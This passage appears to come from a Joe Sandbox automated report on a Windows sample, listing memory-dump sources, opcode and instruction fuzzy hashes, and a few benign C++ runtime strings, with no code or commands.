                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5d791405aacb919d4263b5714a13f572361568e368835af5ccba946ec856f9e7
                            • Instruction ID: 27bcf2977f9a32787974cf5290c90f72c8dc80390e064bc9052130880f6f12e1
                            • Opcode Fuzzy Hash: 5d791405aacb919d4263b5714a13f572361568e368835af5ccba946ec856f9e7
                            • Instruction Fuzzy Hash: 34A2A26260CED185E7749A29A0403AEFBA4F781BA4F584235DBDD83BD8CF7DD4548B20
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d4509387bb9c32b6876ae089fc136afa09a815a373c11641d040fd0c2cf1ef54
                            • Instruction ID: 9dfb45e1e2d4328be5c33213261b29f6392f19077a879fcf35767b2c09a93980
                            • Opcode Fuzzy Hash: d4509387bb9c32b6876ae089fc136afa09a815a373c11641d040fd0c2cf1ef54
                            • Instruction Fuzzy Hash: 88A2942260CBD1C5E7709A2990443AEFBA4F785BA4F984235DB9D83BD8CF7CD4549B20
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 615b3e26cb42071c26fb225ef7005749b09b0aed456080411f3c064c748998d9
                            • Instruction ID: 2d60fa51a703e7d7954f59ca22784c581e02c77b4cf7deacfd2036419cb5b481
                            • Opcode Fuzzy Hash: 615b3e26cb42071c26fb225ef7005749b09b0aed456080411f3c064c748998d9
                            • Instruction Fuzzy Hash: F2A2A22260CFD185E7709A2AA0443AEEBA5F781BA4F584235DB9D83BD9CF7CD454CB10
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID: c
                            • API String ID: 39653677-112844655
                            • Opcode ID: 809b7d1d86638f844ac246aba48d4e44245e5d62022d91d7326554643c2608a7
                            • Instruction ID: 4f7ea939b655615e58079b8f9fff94bb4ba015a80b17a3fa62b4a587ffd3c167
                            • Opcode Fuzzy Hash: 809b7d1d86638f844ac246aba48d4e44245e5d62022d91d7326554643c2608a7
                            • Instruction Fuzzy Hash: 3F929F32608BC586EB609F25E4407AAB7A2F785790F580139EFAD477A8DF7CE460D710
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: wcslen
                            • String ID: c
                            • API String ID: 4088430540-112844655
                            • Opcode ID: 0d242d407649b839329bdf5135c751a417367705ca84fb9fc8c210f504af3f76
                            • Instruction ID: 11f8cb87be4dd4a5bc7633a4fee863a4590a3a3f14a7d174a694b2bce48d2b7b
                            • Opcode Fuzzy Hash: 0d242d407649b839329bdf5135c751a417367705ca84fb9fc8c210f504af3f76
                            • Instruction Fuzzy Hash: A8727136619BC589E7609F25E4406AEBBA0F795B80F984031EECD477A8DF3CE461D710
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9163f786d8b4aa6d01a90728f727ed4ec4685c13e1463792fef3bbe3c80a5566
                            • Instruction ID: 5a3d959d1051fa099084017640cfc0f2eda206c7a9d8595658f157c18e342fb4
                            • Opcode Fuzzy Hash: 9163f786d8b4aa6d01a90728f727ed4ec4685c13e1463792fef3bbe3c80a5566
                            • Instruction Fuzzy Hash: DA029522A1DBC141FAA1AB55A4003FAE7A1EF857C4F9C4036DE8D8BB95DE3CF454A710
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: A
                            • API String ID: 0-3554254475
                            • Opcode ID: b29a5adb9fd896d05f6e5afdb96a8cab5316a2c34f5ea098508e42382409287d
                            • Instruction ID: 5d9cd1112febffc96139c66b15ac808945197c797b4d771048a077ade359acbb
                            • Opcode Fuzzy Hash: b29a5adb9fd896d05f6e5afdb96a8cab5316a2c34f5ea098508e42382409287d
                            • Instruction Fuzzy Hash: 97627B22A0CFC289E7709B25A4447ABBBA1FB85784F984135EB8D43B99DF3CD454CB50
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0698f6df3787ddaa05ef98e561f0edd88bcab210f8b56cfa12bab591b1a70919
                            • Instruction ID: 9a6fbde08bfebb88e06e05989e5a36bed136f976409e7f14af7c4def4140a311
                            • Opcode Fuzzy Hash: 0698f6df3787ddaa05ef98e561f0edd88bcab210f8b56cfa12bab591b1a70919
                            • Instruction Fuzzy Hash: 9D52933260CBC286E7659B2590402AEBBA6F795794F584135EBD9837DDCF3CE850CB20
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0
                            • API String ID: 0-4108050209
                            • Opcode ID: 8138f7841b37fc0ae1978161da3a701b0b157e1b2e5d0f6d22eb1654adba8d06
                            • Instruction ID: 1674ed3bb0ee82e8afec4b6a039d4edcb55d18ee1a0f6a4ccf77e9f6d55631e8
                            • Opcode Fuzzy Hash: 8138f7841b37fc0ae1978161da3a701b0b157e1b2e5d0f6d22eb1654adba8d06
                            • Instruction Fuzzy Hash: F5529422A0C6C181EAA0AB15D4403BBE7A1EF85794F9C4132DAAE8B7D5CF7DF854D710
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7e567e4460cd1929917eb7d8092f56d2ba6b35d79253c3f73c9a6ea1430c1e34
                            • Instruction ID: 1b7a5168c94a655823279198c7fb9426d4ee8a9b6a41b952f0217d751918b03e
                            • Opcode Fuzzy Hash: 7e567e4460cd1929917eb7d8092f56d2ba6b35d79253c3f73c9a6ea1430c1e34
                            • Instruction Fuzzy Hash: 9A52C62250DAC286E7219B69D0402AEFBA5F7857A4F480235EB9D837DDCF7CD850CB61
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f24d0e43e873c5b9285c9fb8ff68957e9342ae24e852544cba1b979b29b250a2
                            • Instruction ID: 7f5ad31929b00ca57eaa46192b1b472dcf9784d553f8eeee60e1aff333ed5672
                            • Opcode Fuzzy Hash: f24d0e43e873c5b9285c9fb8ff68957e9342ae24e852544cba1b979b29b250a2
                            • Instruction Fuzzy Hash: E952956260CBC186E7219B65A0402EBFBA4F7957A4F480635EF9D83BD9CF7CD4548B20
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a504be032e5913bafd47d0c2a1bc060521c65f7813b829636fe61b6ec759e33b
                            • Instruction ID: f213496184a62e57a90121a54951400d9c773b67978e5b4be7d5854e016b952f
                            • Opcode Fuzzy Hash: a504be032e5913bafd47d0c2a1bc060521c65f7813b829636fe61b6ec759e33b
                            • Instruction Fuzzy Hash: 5F52E73260DBC186E7619A25E0003AEBBA5F791754F884135EB9983BDDCF3CD854CB61
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: basic_string::append
                            • API String ID: 0-3811946249
                            • Opcode ID: ac4332f32bca6a1eca298c33a053cd57ce21bedcacafd793bd8680f231698369
                            • Instruction ID: 42ec22a01e0f17edb338741c30fb9497b979c8474392225dffeb2cbc289a018d
                            • Opcode Fuzzy Hash: ac4332f32bca6a1eca298c33a053cd57ce21bedcacafd793bd8680f231698369
                            • Instruction Fuzzy Hash: 2522A262B18EC681EB24EA65A4106BAE291FF41BC4F8C4531DE5D8779DEF3CE4818350
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: y
                            • API String ID: 0-4225443349
                            • Opcode ID: 00e3bf986532cd8c3f5da5e7db3c43c67c750486d54463f6ac4e7e5168cc2e50
                            • Instruction ID: 004697ed750fa07070a0f69b169d0308d2d7b7837b0fc86274159bfca71fc673
                            • Opcode Fuzzy Hash: 00e3bf986532cd8c3f5da5e7db3c43c67c750486d54463f6ac4e7e5168cc2e50
                            • Instruction Fuzzy Hash: 1802D236609F8486E7609F6AF84079AB7A5F789B90F54412AEECC47B28DF3CD055CB00
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 59900aa1fd7c55f1a40635090808814f53b3c496e68cf3ff033d1f448ead1d90
                            • Instruction ID: ed39847f82b6d8eff91b50ade657b1c5a0efe28839221bf2f7b1d7d089516f30
                            • Opcode Fuzzy Hash: 59900aa1fd7c55f1a40635090808814f53b3c496e68cf3ff033d1f448ead1d90
                            • Instruction Fuzzy Hash: D591D972B187814BE764EE2694506BBF6A1EB84788F8C5034ED4A4FB59DE3CF8109F50
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: cannot create shim for unknown locale::facet
                            • API String ID: 0-3485955043
                            • Opcode ID: bce6c4018e0d29dcd16b808fcdc0caf0419a3559b49e9d5b2504a0edea35075d
                            • Instruction ID: 286d26b5410bb7f312a97bcf3628175014c60ce504df0855fa30a42705baa294
                            • Opcode Fuzzy Hash: bce6c4018e0d29dcd16b808fcdc0caf0419a3559b49e9d5b2504a0edea35075d
                            • Instruction Fuzzy Hash: 35325E32A0AF8597E764AF15E5553AAB3A0FB04744F888039C7CD4BB95DF7CE46483A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: -
                            • API String ID: 0-2547889144
                            • Opcode ID: 0d7dd12613f0f97f6d4efc2935ded9c75b576818ef2beb108cea7798af2851bd
                            • Instruction ID: faf15c16083e4c2fbb853be72024daa9a3c35dafa46b887ea36588cb978e0b11
                            • Opcode Fuzzy Hash: 0d7dd12613f0f97f6d4efc2935ded9c75b576818ef2beb108cea7798af2851bd
                            • Instruction Fuzzy Hash: E102B726B1C7C385EB649A25D4403BDA761FBA1B84F8C4531DA8D0BB94DF2DE462E720
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: -
                            • API String ID: 0-2547889144
                            • Opcode ID: 7c39f3f350541155cc9856a67a2df6a4d34f6e83d62a8642f01eaeeb364e73cc
                            • Instruction ID: cb715e493feb2dd64c89db2bebd01c7281bb06ac80d20aa8b7906ccee598cdf0
                            • Opcode Fuzzy Hash: 7c39f3f350541155cc9856a67a2df6a4d34f6e83d62a8642f01eaeeb364e73cc
                            • Instruction Fuzzy Hash: C702EA2660CBC285EB649B25D4403BDE761FBA1B94F884071DA8D0BBD4DF7DE462E720
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: c
                            • API String ID: 0-112844655
                            • Opcode ID: f51cd90450abb64c71f8cac3a6d7a93f7cb70e09a503abf1c888e2cba89a7d8d
                            • Instruction ID: 3a176eb8becc4f697accd225f76939ee655498b77c87ff2f2eead85428821b2b
                            • Opcode Fuzzy Hash: f51cd90450abb64c71f8cac3a6d7a93f7cb70e09a503abf1c888e2cba89a7d8d
                            • Instruction Fuzzy Hash: 74E1B133A0CBD286DA70EA1490443FAB7A1FB95B50F890139DB990B798DF3CE569D710
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: .
                            • API String ID: 0-248832578
                            • Opcode ID: 31ef33f10eb3595401dee1d51fb47bdb6ee357af58df66754f874810386ccdf6
                            • Instruction ID: c0831af633a7536f31a01247c2d9fc73ed78fc769c65c37cca6a2183a1a85bcd
                            • Opcode Fuzzy Hash: 31ef33f10eb3595401dee1d51fb47bdb6ee357af58df66754f874810386ccdf6
